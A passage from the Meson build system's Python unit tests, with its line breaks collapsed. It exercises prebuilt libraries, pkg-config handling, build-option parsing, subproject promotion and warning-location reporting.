/usr/lib/gccVERSION self.assertTrue(rpath.startswith('/usr/lib/gcc')) self.assertEqual(len(rpath.split(':')), 1) else: self.assertTrue(rpath is None) def test_dash_d_dedup(self): testdir = os.path.join(self.unit_test_dir, '9 d dedup') self.init(testdir) cmd = self.get_compdb()[0]['command'] self.assertTrue('-D FOO -D BAR' in cmd or '"-D" "FOO" "-D" "BAR"' in cmd or '/D FOO /D BAR' in cmd or '"/D" "FOO" "/D" "BAR"' in cmd) def test_all_forbidden_targets_tested(self): ''' Test that all forbidden targets are tested in the '151 reserved targets' test. Needs to be a unit test because it accesses Meson internals. ''' testdir = os.path.join(self.common_test_dir, '151 reserved targets') targets = mesonbuild.coredata.FORBIDDEN_TARGET_NAMES # We don't actually define a target with this name targets.pop('build.ninja') # Remove this to avoid multiple entries with the same name # but different case. targets.pop('PHONY') for i in targets: self.assertPathExists(os.path.join(testdir, i)) def detect_prebuild_env(self): env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) stlinker = env.detect_static_linker(cc) if mesonbuild.mesonlib.is_windows(): object_suffix = 'obj' shared_suffix = 'dll' elif mesonbuild.mesonlib.is_cygwin(): object_suffix = 'o' shared_suffix = 'dll' elif mesonbuild.mesonlib.is_osx(): object_suffix = 'o' shared_suffix = 'dylib' else: object_suffix = 'o' shared_suffix = 'so' return (cc, stlinker, object_suffix, shared_suffix) def pbcompile(self, compiler, source, objectfile, extra_args=None): cmd = compiler.get_exelist() extra_args = extra_args or [] if compiler.get_argument_syntax() == 'msvc': cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args else: cmd += ['-c', source, '-o', objectfile] + extra_args subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) def test_prebuilt_object(self): (compiler, _, object_suffix, _) = self.detect_prebuild_env() tdir = os.path.join(self.unit_test_dir, '15 prebuilt object') source = os.path.join(tdir, 'source.c') objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix) self.pbcompile(compiler, source, objectfile) try: self.init(tdir) self.build() self.run_tests() finally: os.unlink(objectfile) def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None): if extra_args is None: extra_args = [] if compiler.get_argument_syntax() == 'msvc': link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile] else: link_cmd = ['ar', 'csr', outfile, objectfile] link_cmd = linker.get_exelist() link_cmd += linker.get_always_args() link_cmd += linker.get_std_link_args() link_cmd += linker.get_output_args(outfile) link_cmd += [objectfile] self.pbcompile(compiler, source, objectfile, extra_args=extra_args) try: subprocess.check_call(link_cmd) finally: os.unlink(objectfile) def test_prebuilt_static_lib(self): (cc, stlinker, object_suffix, _) = self.detect_prebuild_env() tdir = os.path.join(self.unit_test_dir, '16 prebuilt static') source = os.path.join(tdir, 'libdir/best.c') objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix) stlibfile = os.path.join(tdir, 'libdir/libbest.a') self.build_static_lib(cc, stlinker, source, objectfile, stlibfile) # Run the test try: self.init(tdir) self.build() self.run_tests() finally: os.unlink(stlibfile) def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None): if extra_args is None: extra_args = [] if compiler.get_argument_syntax() == 'msvc': link_cmd = compiler.get_linker_exelist() + [ '/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile, '/OUT:' + outfile, objectfile] else: if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()): extra_args += ['-fPIC'] link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile] if not mesonbuild.mesonlib.is_osx(): link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)] self.pbcompile(compiler, source, objectfile, extra_args=extra_args) try: subprocess.check_call(link_cmd) finally: os.unlink(objectfile) def test_prebuilt_shared_lib(self): (cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env() tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared') source = os.path.join(tdir, 'alexandria.c') objectfile = os.path.join(tdir, 'alexandria.' + object_suffix) impfile = os.path.join(tdir, 'alexandria.lib') if cc.get_argument_syntax() == 'msvc': shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix) elif is_cygwin(): shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix) else: shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix) self.build_shared_lib(cc, source, objectfile, shlibfile, impfile) # Run the test try: self.init(tdir) self.build() self.run_tests() finally: os.unlink(shlibfile) if mesonbuild.mesonlib.is_windows(): # Clean up all the garbage MSVC writes in the # source tree. for fname in glob(os.path.join(tdir, 'alexandria.*')): if os.path.splitext(fname)[1] not in ['.c', '.h']: os.unlink(fname) @skipIfNoPkgconfig def test_pkgconfig_static(self): ''' Test that the we prefer static libraries when `static: true` is passed to dependency() with pkg-config. Can't be an ordinary test because we need to build libs and try to find them from meson.build Also test that it's not a hard error to have unsatisfiable library deps since system libraries -lm will never be found statically. https://github.com/mesonbuild/meson/issues/2785 ''' (cc, stlinker, objext, shext) = self.detect_prebuild_env() testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static') source = os.path.join(testdir, 'foo.c') objectfile = os.path.join(testdir, 'foo.' + objext) stlibfile = os.path.join(testdir, 'libfoo.a') impfile = os.path.join(testdir, 'foo.lib') if cc.get_argument_syntax() == 'msvc': shlibfile = os.path.join(testdir, 'foo.' + shext) elif is_cygwin(): shlibfile = os.path.join(testdir, 'cygfoo.' + shext) else: shlibfile = os.path.join(testdir, 'libfoo.' + shext) # Build libs self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC']) self.build_shared_lib(cc, source, objectfile, shlibfile, impfile) # Run test try: self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir}) self.build() self.run_tests() finally: os.unlink(stlibfile) os.unlink(shlibfile) if mesonbuild.mesonlib.is_windows(): # Clean up all the garbage MSVC writes in the # source tree. for fname in glob(os.path.join(testdir, 'foo.*')): if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']: os.unlink(fname) @skipIfNoPkgconfig @mock.patch.dict(os.environ) def test_pkgconfig_gen_escaping(self): testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen') prefix = '/usr/with spaces' libdir = 'lib' self.init(testdir, extra_args=['--prefix=' + prefix, '--libdir=' + libdir]) # Find foo dependency os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir env = get_fake_env(testdir, self.builddir, self.prefix) kwargs = {'required': True, 'silent': True} foo_dep = PkgConfigDependency('libfoo', env, kwargs) # Ensure link_args are properly quoted libdir = PurePath(prefix) / PurePath(libdir) link_args = ['-L' + libdir.as_posix(), '-lfoo'] self.assertEqual(foo_dep.get_link_args(), link_args) # Ensure include args are properly quoted incdir = PurePath(prefix) / PurePath('include') cargs = ['-I' + incdir.as_posix(), '-DLIBFOO'] # pkg-config and pkgconf does not respect the same order self.assertEqual(sorted(foo_dep.get_compile_args()), sorted(cargs)) def test_array_option_change(self): def get_opt(): opts = self.introspect('--buildoptions') for x in opts: if x.get('name') == 'list': return x raise Exception(opts) expected = { 'name': 'list', 'description': 'list', 'section': 'user', 'type': 'array', 'value': ['foo', 'bar'], 'machine': 'any', } tdir = os.path.join(self.unit_test_dir, '19 array option') self.init(tdir) original = get_opt() self.assertDictEqual(original, expected) expected['value'] = ['oink', 'boink'] self.setconf('-Dlist=oink,boink') changed = get_opt() self.assertEqual(changed, expected) def test_array_option_bad_change(self): def get_opt(): opts = self.introspect('--buildoptions') for x in opts: if x.get('name') == 'list': return x raise Exception(opts) expected = { 'name': 'list', 'description': 'list', 'section': 'user', 'type': 'array', 'value': ['foo', 'bar'], 'machine': 'any', } tdir = os.path.join(self.unit_test_dir, '19 array option') self.init(tdir) original = get_opt() self.assertDictEqual(original, expected) with self.assertRaises(subprocess.CalledProcessError): self.setconf('-Dlist=bad') changed = get_opt() self.assertDictEqual(changed, expected) def test_array_option_empty_equivalents(self): """Array options treat -Dopt=[] and -Dopt= as equivalent.""" def get_opt(): opts = self.introspect('--buildoptions') for x in opts: if x.get('name') == 'list': return x raise Exception(opts) expected = { 'name': 'list', 'description': 'list', 'section': 'user', 'type': 'array', 'value': [], 'machine': 'any', } tdir = os.path.join(self.unit_test_dir, '19 array option') self.init(tdir, extra_args='-Dlist=') original = get_opt() self.assertDictEqual(original, expected) def opt_has(self, name, value): res = self.introspect('--buildoptions') found = False for i in res: if i['name'] == name: self.assertEqual(i['value'], value) found = True break self.assertTrue(found, "Array option not found in introspect data.") def test_free_stringarray_setting(self): testdir = os.path.join(self.common_test_dir, '41 options') self.init(testdir) self.opt_has('free_array_opt', []) self.setconf('-Dfree_array_opt=foo,bar', will_build=False) self.opt_has('free_array_opt', ['foo', 'bar']) self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False) self.opt_has('free_array_opt', ['a,b', 'c,d']) # When running under Travis Mac CI, the file updates seem to happen # too fast so the timestamps do not get properly updated. # Call this method before file operations in appropriate places # to make things work. def mac_ci_delay(self): if is_osx() and is_ci(): import time time.sleep(1) def test_options_with_choices_changing(self) -> None: """Detect when options like arrays or combos have their choices change.""" testdir = Path(os.path.join(self.unit_test_dir, '85 change option choices')) options1 = str(testdir / 'meson_options.1.txt') options2 = str(testdir / 'meson_options.2.txt') # Test that old options are changed to the new defaults if they are not valid real_options = str(testdir / 'meson_options.txt') self.addCleanup(os.unlink, real_options) shutil.copy(options1, real_options) self.init(str(testdir)) self.mac_ci_delay() shutil.copy(options2, real_options) self.build() opts = self.introspect('--buildoptions') for item in opts: if item['name'] == 'combo': self.assertEqual(item['value'], 'b') self.assertEqual(item['choices'], ['b', 'c', 'd']) elif item['name'] == 'arr': self.assertEqual(item['value'], ['b']) self.assertEqual(item['choices'], ['b', 'c', 'd']) self.wipe() self.mac_ci_delay() # When the old options are valid they should remain shutil.copy(options1, real_options) self.init(str(testdir), extra_args=['-Dcombo=c', '-Darray=b,c']) self.mac_ci_delay() shutil.copy(options2, real_options) self.build() opts = self.introspect('--buildoptions') for item in opts: if item['name'] == 'combo': self.assertEqual(item['value'], 'c') self.assertEqual(item['choices'], ['b', 'c', 'd']) elif item['name'] == 'arr': self.assertEqual(item['value'], ['b', 'c']) self.assertEqual(item['choices'], ['b', 'c', 'd']) def test_subproject_promotion(self): testdir = os.path.join(self.unit_test_dir, '12 promote') workdir = os.path.join(self.builddir, 'work') shutil.copytree(testdir, workdir) spdir = os.path.join(workdir, 'subprojects') s3dir = os.path.join(spdir, 's3') scommondir = os.path.join(spdir, 'scommon') self.assertFalse(os.path.isdir(s3dir)) subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir, stdout=subprocess.DEVNULL) self.assertTrue(os.path.isdir(s3dir)) self.assertFalse(os.path.isdir(scommondir)) self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'], cwd=workdir, stdout=subprocess.DEVNULL), 0) self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'], cwd=workdir, stderr=subprocess.DEVNULL), 0) self.assertFalse(os.path.isdir(scommondir)) subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir) self.assertTrue(os.path.isdir(scommondir)) promoted_wrap = os.path.join(spdir, 'athing.wrap') self.assertFalse(os.path.isfile(promoted_wrap)) subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir) self.assertTrue(os.path.isfile(promoted_wrap)) self.init(workdir) self.build() def test_subproject_promotion_wrap(self): testdir = os.path.join(self.unit_test_dir, '44 promote wrap') workdir = os.path.join(self.builddir, 'work') shutil.copytree(testdir, workdir) spdir = os.path.join(workdir, 'subprojects') ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap') self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'], cwd=workdir, stdout=subprocess.DEVNULL), 0) self.assertFalse(os.path.isfile(ambiguous_wrap)) subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir) self.assertTrue(os.path.isfile(ambiguous_wrap)) def test_warning_location(self): tdir = os.path.join(self.unit_test_dir, '22 warning location') out = self.init(tdir) for expected in [ r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.', r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.', r'meson.build:6: WARNING: a warning of some sort', r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning', r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.', r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.", r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".', ]: self.assertRegex(out, re.escape(expected)) for wd in [ self.src_root, self.builddir, os.getcwd(), ]: self.new_builddir() out = self.init(tdir, workdir=wd) expected = os.path.join(relpath(tdir, self.src_root), 'meson.build') relwd = relpath(self.src_root, wd) if relwd != '.': expected = os.path.join(relwd, expected) expected = '\n' + expected + ':' self.assertIn(expected, out) def test_error_location_path(self): '''Test locations in meson errors contain correct paths''' # this list contains errors from all the different steps in the # lexer/parser/interpreter we have tests for. for (t, f) in [ ('10 out of bounds', 'meson.build'), ('18 wrong plusassign', 'meson.build'), ('61 bad option argument', 'meson_options.txt'), ('102 subdir parse error', os.path.join('subdir', 'meson.build')), ('103 invalid option file', 'meson_options.txt'), ]: tdir = os.path.join(self.src_root, 'test cases', 'failing', t) for wd in [ self.src_root, self.builddir, os.getcwd(), ]: try: self.init(tdir, workdir=wd) except subprocess.CalledProcessError as e: expected = os.path.join('test cases', 'failing', t, f) relwd = relpath(self.src_root, wd) if relwd != '.': expected = os.path.join(relwd, expected) expected = '\n' + expected + ':' self.assertIn(expected, e.output) else: self.fail('configure unexpectedly succeeded') def test_permitted_method_kwargs(self): tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs') out = self.init(tdir) for expected in [ r'WARNING: Passed invalid keyword argument "prefixxx".', r'WARNING: Passed invalid keyword argument "argsxx".', r'WARNING: Passed invalid keyword argument "invalidxx".', ]: self.assertRegex(out, re.escape(expected)) def test_templates(self): ninja = detect_ninja() if ninja is None: raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.') langs = ['c'] env = get_fake_env() for l in ['cpp', 'cs', 'd', 'java', 'cuda', 'fortran', 'objc', 'objcpp', 'rust']: try: comp = getattr(env, f'detect_{l}_compiler')(MachineChoice.HOST) with tempfile.TemporaryDirectory() as d: comp.sanity_check(d, env) langs.append(l) except EnvironmentException: pass for lang in langs: for target_type in ('executable', 'library'): # test empty directory with tempfile.TemporaryDirectory() as tmpdir: self._run(self.meson_command + ['init', '--language', lang, '--type', target_type], workdir=tmpdir) self._run(self.setup_command + ['--backend=ninja', 'builddir'], workdir=tmpdir) self._run(ninja, workdir=os.path.join(tmpdir, 'builddir')) # test directory with existing code file if lang in {'c', 'cpp', 'd'}: with tempfile.TemporaryDirectory() as tmpdir: with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f: f.write('int main(void) {}') self._run(self.meson_command + ['init', '-b'], workdir=tmpdir) elif lang in {'java'}: with tempfile.TemporaryDirectory() as tmpdir: with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f: f.write('public class Foo { public static void main() {} }') self._run(self.meson_command + ['init', '-b'], workdir=tmpdir) def test_compiler_run_command(self): ''' The test checks that the compiler object can be passed to run_command(). ''' testdir = os.path.join(self.unit_test_dir, '24 compiler run_command') self.init(testdir) def test_identical_target_name_in_subproject_flat_layout(self): ''' Test that identical targets in different subprojects do not collide if layout is flat. ''' testdir = os.path.join(self.common_test_dir, '173 identical target name in subproject flat layout') self.init(testdir, extra_args=['--layout=flat']) self.build() def test_identical_target_name_in_subdir_flat_layout(self): ''' Test that identical targets in different subdirs do not collide if layout is flat. ''' testdir = os.path.join(self.common_test_dir, '182 same target name flat layout') self.init(testdir, extra_args=['--layout=flat']) self.build() def test_flock(self): exception_raised = False with tempfile.TemporaryDirectory() as tdir: os.mkdir(os.path.join(tdir, 'meson-private')) with BuildDirLock(tdir): try: with BuildDirLock(tdir): pass except MesonException: exception_raised = True self.assertTrue(exception_raised, 'Double locking did not raise exception.') @unittest.skipIf(is_osx(), 'Test not applicable to OSX') def test_check_module_linking(self): """ Test that link_with: a shared module issues a warning https://github.com/mesonbuild/meson/issues/2865 (That an error is raised on OSX is exercised by test failing/78) """ tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking') out = self.init(tdir) msg = ('WARNING: target links against shared modules. This is not ' 'recommended as it is not supported on some platforms') self.assertIn(msg, out) def test_ndebug_if_release_disabled(self): testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release') self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release']) self.build() exe = os.path.join(self.builddir, 'main') self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip()) def test_ndebug_if_release_enabled(self): testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release') self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release']) self.build() exe = os.path.join(self.builddir, 'main') self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip()) def test_guessed_linker_dependencies(self): ''' Test that meson adds dependencies for libraries based on the final linker command line. ''' testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies') testdirlib = os.path.join(testdirbase, 'lib') extra_args = None libdir_flags = ['-L'] env = get_fake_env(testdirlib, self.builddir, self.prefix) if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}: # msvc-like compiler, also test it with msvc-specific flags libdir_flags += ['/LIBPATH:', '-LIBPATH:'] else: # static libraries are not linkable with -l with msvc because meson installs them # as .a files which unix_args_to_native will not know as it expects libraries to use # .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc # this tests needs to use shared libraries to test the path resolving logic in the # dependency generation code path. extra_args = ['--default-library', 'static'] initial_builddir = self.builddir initial_installdir = self.installdir for libdir_flag in libdir_flags: # build library self.new_builddir() self.init(testdirlib, extra_args=extra_args) self.build() self.install() libbuilddir = self.builddir installdir = self.installdir libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib') # build user of library self.new_builddir() # replace is needed because meson mangles platform paths passed via LDFLAGS self.init(os.path.join(testdirbase, 'exe'), override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))}) self.build() self.assertBuildIsNoop() # rebuild library exebuilddir = self.builddir self.installdir = installdir self.builddir = libbuilddir # Microsoft's compiler is quite smart about touching import libs on changes, # so ensure that there is actually a change in symbols. self.setconf('-Dmore_exports=true') self.build() self.install() # no ensure_backend_detects_changes needed because self.setconf did that already # assert user of library will be rebuild self.builddir = exebuilddir self.assertRebuiltTarget('app') # restore dirs for the next test case self.installdir = initial_builddir self.builddir = initial_installdir def test_conflicting_d_dash_option(self): testdir = os.path.join(self.unit_test_dir, '37 mixed command line args') with self.assertRaises(subprocess.CalledProcessError) as e: self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar']) # Just to ensure that we caught the correct error self.assertIn('passed as both', e.stderr) def _test_same_option_twice(self, arg, args): testdir = os.path.join(self.unit_test_dir, '37 mixed command line args') self.init(testdir, extra_args=args) opts = self.introspect('--buildoptions') for item in opts: if item['name'] == arg: self.assertEqual(item['value'], 'bar') return raise Exception('Missing {} value?'.format(arg)) def test_same_dash_option_twice(self): self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar']) def test_same_d_option_twice(self): self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar']) def test_same_project_d_option_twice(self): self._test_same_option_twice('one', ['-Done=foo', '-Done=bar']) def _test_same_option_twice_configure(self, arg, args): testdir = os.path.join(self.unit_test_dir, '37 mixed command line args') self.init(testdir) self.setconf(args) opts = self.introspect('--buildoptions') for item in opts: if item['name'] == arg: self.assertEqual(item['value'], 'bar') return raise Exception('Missing {} value?'.format(arg)) def test_same_dash_option_twice_configure(self): self._test_same_option_twice_configure( 'bindir', ['--bindir=foo', '--bindir=bar']) def test_same_d_option_twice_configure(self): self._test_same_option_twice_configure( 'bindir', ['-Dbindir=foo', '-Dbindir=bar']) def test_same_project_d_option_twice_configure(self): self._test_same_option_twice_configure( 'one', ['-Done=foo', '-Done=bar']) def test_command_line(self): testdir = os.path.join(self.unit_test_dir, '34 command line') # Verify default values when passing no args that affect the # configuration, and as a bonus, test that --profile-self works. self.init(testdir, extra_args=['--profile-self']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['default_library'].value, 'static') self.assertEqual(obj.builtins['warning_level'].value, '1') self.assertEqual(obj.user_options['set_sub_opt'].value, True) self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3') self.wipe() # warning_level is special, it's --warnlevel instead of --warning-level # for historical reasons self.init(testdir, extra_args=['--warnlevel=2']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '2') self.setconf('--warnlevel=3') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '3') self.wipe() # But when using -D syntax, it should be 'warning_level' self.init(testdir, extra_args=['-Dwarning_level=2']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '2') self.setconf('-Dwarning_level=3') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '3') self.wipe() # Mixing --option and -Doption is forbidden with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3']) self.assertNotEqual(0, cm.exception.returncode) self.assertIn('as both', cm.exception.output) self.init(testdir) with self.assertRaises(subprocess.CalledProcessError) as cm: self.setconf(['--warnlevel=1', '-Dwarning_level=3']) self.assertNotEqual(0, cm.exception.returncode) self.assertIn('as both', cm.exception.output) self.wipe() # --default-library should override default value from project() self.init(testdir, extra_args=['--default-library=both']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['default_library'].value, 'both') self.setconf('--default-library=shared') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['default_library'].value, 'shared') if self.backend is Backend.ninja: # reconfigure target works only with ninja backend self.build('reconfigure') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['default_library'].value, 'shared') self.wipe() # Should warn on unknown options out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo']) self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out) self.wipe() # Should fail on malformed option with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testdir, extra_args=['-Dfoo']) self.assertNotEqual(0, cm.exception.returncode) self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output) self.init(testdir) with self.assertRaises(subprocess.CalledProcessError) as cm: self.setconf('-Dfoo') self.assertNotEqual(0, cm.exception.returncode) self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output) self.wipe() # It is not an error to set wrong option for unknown subprojects or # language because we don't have control on which one will be selected. self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1']) self.wipe() # Test we can set subproject option self.init(testdir, extra_args=['-Dsubp:subp_opt=foo']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo') self.wipe() # c_args value should be parsed with split_args self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two']) self.setconf('-Dc_args="foo bar" one two') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.compiler_options.host['c']['args'].value, ['foo bar', 'one', 'two']) self.wipe() self.init(testdir, extra_args=['-Dset_percent_opt=myoption%']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%') self.wipe() # Setting a 2nd time the same option should override the first value try: self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar', '-Dbuildtype=plain', '-Dbuildtype=release', '-Db_sanitize=address', '-Db_sanitize=thread', '-Dc_args=-Dfoo', '-Dc_args=-Dbar']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['bindir'].value, 'bar') self.assertEqual(obj.builtins['buildtype'].value, 'release') self.assertEqual(obj.base_options['b_sanitize'].value, 'thread') self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dbar']) self.setconf(['--bindir=bar', '--bindir=foo', '-Dbuildtype=release', '-Dbuildtype=plain', '-Db_sanitize=thread', '-Db_sanitize=address', '-Dc_args=-Dbar', '-Dc_args=-Dfoo']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['bindir'].value, 'foo') self.assertEqual(obj.builtins['buildtype'].value, 'plain') self.assertEqual(obj.base_options['b_sanitize'].value, 'address') self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo']) self.wipe() except KeyError: # Ignore KeyError, it happens on CI for compilers that does not # support b_sanitize. We have to test with a base option because # they used to fail this test with Meson 0.46 an earlier versions. pass def test_warning_level_0(self): testdir = os.path.join(self.common_test_dir, '208 warning level 0') # Verify default values when passing no args self.init(testdir) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '0') self.wipe() # verify we can override w/ --warnlevel self.init(testdir, extra_args=['--warnlevel=1']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '1') self.setconf('--warnlevel=0') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '0') self.wipe() # verify we can override w/ -Dwarning_level self.init(testdir, extra_args=['-Dwarning_level=1']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '1') self.setconf('-Dwarning_level=0') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '0') self.wipe() def test_feature_check_usage_subprojects(self): testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects') out = self.init(testdir) # Parent project warns correctly self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict") # Subprojects warn correctly self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler") self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler") # Subproject has a new-enough meson_version, no warning self.assertNotRegex(out, "WARNING: Project targeting.*Python") # Ensure a summary is printed in the subproject and the outer project self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'") self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}") self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'") self.assertRegex(out, " * 0.47.0: {'dict'}") def test_configure_file_warnings(self): testdir = os.path.join(self.common_test_dir, "14 configure file") out = self.init(testdir) self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*") self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*") self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*") self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in") # Warnings for configuration files that are overwritten. self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites") self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites") self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites") self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites") self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites") # No warnings about empty configuration data objects passed to files with substitutions self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in") self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in") with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f: self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */') with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f: self.assertEqual(f.read().strip(), b'') self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict") def test_dirs(self): with tempfile.TemporaryDirectory() as containing: with tempfile.TemporaryDirectory(dir=containing) as srcdir: mfile = os.path.join(srcdir, 'meson.build') of = open(mfile, 'w') of.write("project('foobar', 'c')\n") of.close() pc = subprocess.run(self.setup_command, cwd=srcdir, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL) self.assertIn(b'Must specify at least one directory name', pc.stdout) with tempfile.TemporaryDirectory(dir=srcdir) as builddir: subprocess.run(self.setup_command, check=True, cwd=builddir, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) def get_opts_as_dict(self): result = {} for i in self.introspect('--buildoptions'): result[i['name']] = i['value'] return result def test_buildtype_setting(self): testdir = os.path.join(self.common_test_dir, '1 trivial') self.init(testdir) opts = self.get_opts_as_dict() self.assertEqual(opts['buildtype'], 'debug') self.assertEqual(opts['debug'], True) self.setconf('-Ddebug=false') opts = self.get_opts_as_dict() self.assertEqual(opts['debug'], False) self.assertEqual(opts['buildtype'], 'plain') self.assertEqual(opts['optimization'], '0') # Setting optimizations to 3 should cause buildtype # to go to release mode. self.setconf('-Doptimization=3') opts = self.get_opts_as_dict() self.assertEqual(opts['buildtype'], 'release') self.assertEqual(opts['debug'], False) self.assertEqual(opts['optimization'], '3') # Going to debug build type should reset debugging # and optimization self.setconf('-Dbuildtype=debug') opts = self.get_opts_as_dict() self.assertEqual(opts['buildtype'], 'debug') 